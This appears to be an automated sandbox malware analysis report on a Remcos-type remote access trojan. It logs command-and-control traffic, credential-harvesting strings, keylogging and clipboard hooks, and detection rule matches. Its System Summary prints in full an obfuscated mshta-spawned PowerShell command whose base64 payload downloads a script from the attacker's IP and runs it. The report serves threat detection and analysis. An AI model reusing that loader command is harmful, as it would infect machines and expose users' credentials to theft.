                      Source: global trafficHTTP traffic detected: GET /550/seethebestpicturewithgreatthingsinlinealways.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 107.175.229.138Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /550/seethebestpicturewithgreatthingsinlinealways.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 107.175.229.138Connection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 107.175.229.138
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_045D4B90 URLDownloadToFileW,1_2_045D4B90
                      Source: global trafficHTTP traffic detected: GET /CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /550/seethebestpicturewithgreatthingsinlinealways.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 107.175.229.138Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /550/seethebestpicturewithgreatthingsinlinealways.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 107.175.229.138Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /550/seethebestpicturewithgreatthingsinlinealways.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 107.175.229.138Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /550/seethebestpicturewithgreatthingsinlinealways.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 107.175.229.138Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /550/MNCCDR.txt HTTP/1.1Host: 107.175.229.138Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /550/MNCCDR.txt HTTP/1.1Host: 107.175.229.138Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: RegAsm.exe, 00000011.00000002.2585525667.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                      Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.2585525667.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                      Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                      Source: RegAsm.exe, 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                      Source: RegAsm.exe, 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                      Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                      Source: global trafficDNS traffic detected: DNS query: danbana.duckdns.org
                      Source: global trafficDNS traffic detected: DNS query: dantata.duckdns.org
                      Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                      Source: powershell.exe, 00000009.00000002.2352442051.0000000005256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.175.229
                      Source: powershell.exe, 00000009.00000002.2352442051.00000000051A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2352442051.0000000005256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.175.229.138
                      Source: powershell.exe, 00000009.00000002.2352442051.00000000051A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2352442051.0000000005256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.175.229.138/550/MNCCDR.txt
                      Source: powershell.exe, 00000009.00000002.2352442051.0000000005256000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.175.229.138/550/MNCCDX
                      Source: powershell.exe, 00000001.00000002.2237686078.00000000049C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://107.175.229.138/550/seethebestpicturewithgreatthingsinlinealways.tIF
                      Source: powershell.exe, 00000001.00000002.2235693173.00000000030BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://107.175.229.138/550/seethebestpicturewithgreatthingsinlinealways.tIFm
                      Source: bhv97B6.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: bhv97B6.tmp.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                      Source: powershell.exe, 00000001.00000002.2235693173.00000000030BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                      Source: bhv97B6.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: bhv97B6.tmp.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: bhv97B6.tmp.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: RegAsm.exe, RegAsm.exe, 0000000B.00000002.4544142973.0000000000AA2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4543306554.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4544142973.0000000000ACB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                      Source: powershell.exe, 00000009.00000002.2362329745.000000000619E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: RegAsm.exe, 0000000B.00000002.4544142973.0000000000AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpX
                      Source: RegAsm.exe, 0000000B.00000002.4543306554.0000000000A5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpge0
                      Source: RegAsm.exe, 0000000B.00000002.4544142973.0000000000AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gphy
                      Source: powershell.exe, 00000003.00000002.2127498822.0000000005969000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                      Source: powershell.exe, 00000001.00000002.2243987921.00000000058D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2129498624.0000000006299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: bhv97B6.tmp.13.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: powershell.exe, 00000009.00000002.2352442051.0000000005088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000003.00000002.2127498822.0000000005386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000001.00000002.2237686078.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2127498822.0000000005231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2470578415.0000000004D17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2352442051.0000000004F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000003.00000002.2127498822.0000000005386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000009.00000002.2352442051.0000000005088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.2585525667.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                      Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.2585525667.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                      Source: RegAsm.exe, 00000011.00000002.2585525667.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                      Source: RegAsm.exe, 00000011.00000002.2585525667.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                      Source: RegAsm.exe, 0000000D.00000002.2592039301.0000000000AF4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                      Source: RegAsm.exe, 00000011.00000002.2585525667.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                      Source: powershell.exe, 00000001.00000002.2237686078.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2127498822.0000000005231000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2470578415.0000000004D17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2470578415.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2352442051.0000000004F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: powershell.exe, 00000003.00000002.2127498822.0000000005386000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: powershell.exe, 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000009.00000002.2352442051.0000000005088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000001.00000002.2237686078.0000000004CC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2352442051.00000000057AD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: RegAsm.exe, 0000000D.00000002.2591863343.000000000071C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://login.li
                      Source: RegAsm.exe, 0000000D.00000002.2592696601.0000000000E48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: RegAsm.exe, 0000000D.00000002.2592696601.0000000000E48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: RegAsm.exe, 0000000D.00000002.2592696601.0000000000E48000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: RegAsm.exeString found in binary or memory: https://login.yahoo.com/config/login
                      Source: powershell.exe, 00000001.00000002.2243987921.00000000058D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2129498624.0000000006299000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 00000009.00000002.2352442051.0000000005088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                      Source: powershell.exe, 00000009.00000002.2386646006.00000000077FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Cryp
                      Source: powershell.exe, 00000009.00000002.2350550754.0000000002F21000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2352442051.0000000005088000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2352442051.0000000004F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2350460443.0000000000CD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/CryptersAndToolsOf
                      Source: powershell.exe, 00000009.00000002.2352442051.0000000005088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg
                      Source: powershell.exe, 00000009.00000002.2352442051.0000000005088000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpgt
                      Source: powershell.exe, 00000009.00000002.2386117984.0000000007692000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/cryptersandtoolsof
                      Source: RegAsm.exe, RegAsm.exe, 00000011.00000002.2585525667.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: RegAsm.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49706 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,0000000011_2_0040A2F3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,11_2_0040B749
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,11_2_004168FC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,13_2_0040987A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,13_2_004098E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_00406DFC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,16_2_00406E9F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_004068B5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,17_2_004072B5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,11_2_0040B749
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,11_2_0040A41B
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.6605ba0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.6605ba0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2362329745.000000000619E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5940, type: MEMORYSTR

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.6605ba0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.6605ba0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4545370630.00000000026AE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4543306554.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4543306554.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2362329745.000000000619E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5940, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041CA73 SystemParametersInfoW,11_2_0041CA73

                      System Summary

                      barindex
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 